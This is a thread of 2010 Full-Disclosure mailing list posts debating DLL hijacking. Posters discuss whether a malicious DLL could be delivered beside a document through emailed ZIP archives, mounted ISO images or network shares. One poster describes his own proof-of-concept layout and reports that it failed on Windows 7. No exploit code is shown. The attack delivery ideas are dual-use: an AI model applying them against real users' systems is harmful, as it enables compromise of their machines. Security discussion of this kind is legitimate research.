The essence of DLL hijacking is to deliver an innocent file together with a malicious DLL, in the one directory. Would it be possible to do this via email: a ZIP (or similar) archive containing the two files? Thoughts about this? I know that an emailed ZIP is searcheable by desktop AV systems; but the signature-based AVs forever play catch-up with the attacks in the wild. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DLL hijacking with ZIP files in email?
On Wed, Sep 1, 2010 at 2:05 PM, paul.sz...@sydney.edu.au wrote: The essence of DLL hijacking is to deliver an innocent file together with a malicious DLL, in the one directory. Would it be possible to do this via email: a ZIP (or similar) archive containing the two files? i don't know of a way to do this with ZIP archives. the daemontools / easycd / related tools which automount ISO and other archive images as drive letters on the host are vulnerable. autorun on/off may add insult to injury with such services... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DLL hijacking with ZIP files in email?
if you email a web page, tipically all files are unzipped when the user double clicks on any .html file but I still don't see this as something drastically different from double clicking on exe files... On Thu, Sep 2, 2010 at 12:45 AM, coderman coder...@gmail.com wrote: On Wed, Sep 1, 2010 at 2:05 PM, paul.sz...@sydney.edu.au wrote: The essence of DLL hijacking is to deliver an innocent file together with a malicious DLL, in the one directory. Would it be possible to do this via email: a ZIP (or similar) archive containing the two files? i don't know of a way to do this with ZIP archives. the daemontools / easycd / related tools which automount ISO and other archive images as drive letters on the host are vulnerable. autorun on/off may add insult to injury with such services... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- HONEY: I want to… put some powder on my nose. GEORGE: Martha, won’t you show her where we keep the euphemism? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DLL hijacking with Autorun on a USB drive
No one is saying there's no threat. It's the way people are going about it that is doing the difference. Patching the vulnerable application won't fix this whole issue. Removing the feature from Windows core will, surely break a lot of programs. Truth is, that dll shouldn't have been in that network share in the first place. And that's the whole difference between Unix-like and Windows. Once something gets into Windows, by design, you are allowing a great deal of access. Ok, as of late they did strides in securing this area, but it wasn't designed this way. The focus should be on keeping that darn dll out of your trusted zone, not what to do with it when it is inside. As the saying goes, prevention is better than cure. Cheers, Chris. On Wed, Sep 1, 2010 at 9:47 PM, matt m...@attackvector.org wrote: And yeah, I find it a joke that you think that .ppt.exe isn't pretty damn obvious. I might have fell for that when I was 9, but I haven't had a problem with a windows box in years. I will admit, at 3AM when I've been working for 18 hours and awake for 36, it is possible that I may double-click such a malicious file and then immediately think OH shit and rebuild. Thats the real threat of this, to be honest. Yes, you, me, and (hopefully) the rest of the people on this list know what to look for before clicking on something. But, do you view a .doc, or .ppt, or .mp3 as malicious and threatening as a .exe, .bat, or .vbs? Probably not. And, you cannot honestly tell me that you've never browsed to a network share and opened a Word document. And, if that Word document opens and there's legitimate data being displayed (ie - it's the document that you were expecting to open), would you ever consider that you just compromised your system? I think that's what a lot of you are missing.. there's no real trickery involved; No changing of icons, no hiding extensions, no fake files.. a DLL could be dropped into any directory containing Office documents and now each one of those Office documents are, essentially, backdoored. And, not only that, but this is affecting file formats which were previously considered benign or harmless (for the most part). - matt www.attackvector.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DLL hijacking POC (failed, see for yourself)
I wrote my own example POC. The files described herein can be found at: http://www.megafileupload.com/en/file/264741/DHPOC-zip.html The above zip files contains: binaries, sources, example (folder structure) The source code is in Pascal, written in Lazarus to be precise. There are 3 executables: dhpocApp.exe, dhpocDll.good.dll, dhpocDll.bad.dll The 2 dlls are renamed to dhpocDll.dll during tests (the example structure): DHPOC\example\the-install-folder\ DHPOC\example\the-install-folder\dhpocApp.exe DHPOC\example\the-install-folder\dhpocDll.dll DHPOC\example\the-remote-folder DHPOC\example\the-remote-folder\example.dhpoc DHPOC\example\the-remote-folder\dhpocDll.dll While testing this, I noticed that the dll hijack exploit completely failed my tests (on Windows 7 64bit). That is, the dll inside the-remote-folder was never loaded, that is, even when example.dhpoc was opened. Also not that in order to fully test it out, I also chdir'd to the target file directory, ie, the-remote-folder; to no avail. The only way I got it working was by renaming/deleting dhpocDll.dll in the-install-folder to something else, in which case running dhpocApp.exe failed while opening example.dhpoc caused the bad dll to load. Finally, I tried testing the zip issue mentioned lately. With everything set up correctly (zipped the-remote-folder and the-install-folder uncompressed), it worked as expected, ie the good dll was loaded. After removing the dll from the-install-folder, the program ceased to work correctly, ie, it neither loaded the zipped dll nor could it load the initial dll. I ran these tests and wrote this code under an hour, so I can guarantee there might be serious flaws around, or things which I should have tested but didn't. So far, I've ran these tests twice, so unless I've got a software fault (which somehow made the software secure?!), this dll hijack issue is either a thing of the best, pretty rare, or, pretty much useless (consider the recent POC where the user was required to open a contact book several before it hopefully worked...). Cheers, Christian Sciberras. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DLL hijacking POC (failed, see for yourself)
Hi Christian, I noticed MS pushed out an update a couple of days ago - on the PC's that have had the update applied the POC does not work for me, where as an unpatched machine the POC works. Has that update been installed? p8x On 2/09/2010 7:43 AM, Christian Sciberras wrote: I wrote my own example POC. The files described herein can be found at: http://www.megafileupload.com/en/file/264741/DHPOC-zip.html The above zip files contains: binaries, sources, example (folder structure) The source code is in Pascal, written in Lazarus to be precise. There are 3 executables: dhpocApp.exe, dhpocDll.good.dll, dhpocDll.bad.dll The 2 dlls are renamed to dhpocDll.dll during tests (the example structure): DHPOC\example\the-install-folder\ DHPOC\example\the-install-folder\dhpocApp.exe DHPOC\example\the-install-folder\dhpocDll.dll DHPOC\example\the-remote-folder DHPOC\example\the-remote-folder\example.dhpoc DHPOC\example\the-remote-folder\dhpocDll.dll While testing this, I noticed that the dll hijack exploit completely failed my tests (on Windows 7 64bit). That is, the dll inside the-remote-folder was never loaded, that is, even when example.dhpoc was opened. Also not that in order to fully test it out, I also chdir'd to the target file directory, ie, the-remote-folder; to no avail. The only way I got it working was by renaming/deleting dhpocDll.dll in the-install-folder to something else, in which case running dhpocApp.exe failed while opening example.dhpoc caused the bad dll to load. Finally, I tried testing the zip issue mentioned lately. With everything set up correctly (zipped the-remote-folder and the-install-folder uncompressed), it worked as expected, ie the good dll was loaded. After removing the dll from the-install-folder, the program ceased to work correctly, ie, it neither loaded the zipped dll nor could it load the initial dll. I ran these tests and wrote this code under an hour, so I can guarantee there might be serious flaws around, or things which I should have tested but didn't. So far, I've ran these tests twice, so unless I've got a software fault (which somehow made the software secure?!), this dll hijack issue is either a thing of the best, pretty rare, or, pretty much useless (consider the recent POC where the user was required to open a contact book several before it hopefully worked...). Cheers, Christian Sciberras. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
